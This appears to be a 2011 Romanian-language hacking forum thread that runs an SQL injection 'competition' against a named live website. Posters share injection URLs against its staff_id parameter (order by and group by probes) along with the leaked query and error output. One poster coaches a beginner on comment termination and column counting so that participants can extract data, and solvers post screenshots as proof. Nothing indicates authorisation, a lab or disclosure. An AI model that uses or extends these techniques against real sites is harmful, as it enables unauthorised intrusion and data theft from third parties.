vlad1395 Posted August 12, 2011 Report Posted August 12, 2011 (edited) O noua competitie, care sper ca o sa va placa.- Sintaxele nu se vor face publice, se vor trimite prin PM !- Postati aici doar un screen-shot ca dovada ca ati rezolvat (fara a se vedea rezolvarea)Cerere: Extrageti ce vreti .Dificultate:EasyMetoda: Union BasedVulnerable Parameter: ICI -SURSA: HFProof: http://img685.imageshack.us/img685/4452/icij.pngNOTA:: Injectia se va face DOAR pe parametrul dat de mine.Solvers1. daemien/denjacker2. ZeroCold Edited August 24, 2011 by vlad1395 1 Quote
gigaevil Posted August 14, 2011 Report Posted August 14, 2011 Incerc de 20 de minute, dar inafara de eroare de sql nu primesc, ar fi interesant un mic help, sau daca s-a terminat cum ai facut. Quote
denjacker Posted August 14, 2011 Report Posted August 14, 2011 spune unde te-ai incurcat ca sa stim cum sa te ajutam mai departe. Quote
gigaevil Posted August 14, 2011 Report Posted August 14, 2011 Sunt incepator intre ale white hat hacking. De exemplu am gasit ca intradevar e vulnerabil la sql injection.Si initial am scrisICI - +order+by+1--Mi-a dat o eroare serverul de sql, ceea ce nu trebuia ca exista coloana 1.Chiar daca ii scriu 100 imi da aceeasi eroareDiscutam in privat? Quote
denjacker Posted August 14, 2011 Report Posted August 14, 2011 Discutam aici sa inteleaga si ceilalti.http://www.communityinclusion.org/staff.php?staff_id=129+order+by+1--hai sa privim eroarea mai atent :error in query1: SELECT a.article_id AS article_idx, article_title, timestamp, article_blurb, article_year_pub, article_month_pub FROM article a, article_staff at WHERE at.article_id = a.article_id and at.staff_id = 129 order by 1-- ORDER BY rank, article_year_pub desc, article_month_pub desc limit 5.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY rank, article_year_pub desc, article_month_pub desc limit 5' at line 3De aici ar trebuii sa deduci :1] commentul folosit pentru a termina query-ul e incomplet sau ... inutil.2] nu poti folosi "order by 1 ORDER BY rank" -- > ptr ca iti va genera eroare de sintaxa.Incearca sa calculezi nr de coloane cu GROUP BY si apoi revino la punctul 1]. De fapt acolo e problema esentiala pentru rezolvarea competitiei. 1 Quote
gigaevil Posted August 14, 2011 Report Posted August 14, 2011 Am incercat' GROUP BY table.columnfromerror1 HAVING 1=1 -- ' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 -- ' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1si tot degeaba Quote
denjacker Posted August 14, 2011 Report Posted August 14, 2011 Nu fratioare...http://www.communityinclusion.org/staff.php?staff_id=129+group+by+156353535353543534error in query1: SELECT a.article_id AS article_idx, article_title, timestamp, article_blurb, article_year_pub, article_month_pub FROM article a, article_staff at WHERE at.article_id = a.article_id and at.staff_id = 129 group by 156353535353543534 ORDER BY rank, article_year_pub desc, article_month_pub desc limit 5.Unknown column '156353535353543534' in 'group statement' Quote
totti93 Posted August 23, 2011 Report Posted August 23, 2011 Nu are rost sa tot dai GROUP BY, cand se vede clar in eroare ca sunt selectate 6 coloane... Quote
xaren Posted August 23, 2011 Report Posted August 23, 2011 Unknown column 'rank' in 'order clause'As putea inlocui rank ala cu o cifra sau @@version sau ... ? ! Quote
vlad1395 Posted August 23, 2011 Author Report Posted August 23, 2011 @Skiddie: Link-ul merge.@xaren: Nu inteleg intrebarea.@All: A mai facut cineva inj3ctia..? daca da, postati aici Screen-Shoot, sau trmiteti prin PM. Have a nice day! Quote
Net_Spy Posted September 7, 2011 Report Posted September 7, 2011 nice share vlad . done I was so stupid to look the termination , I was trying to make it more complex indeed it was fuckin easy. Regards Net_Spy Quote
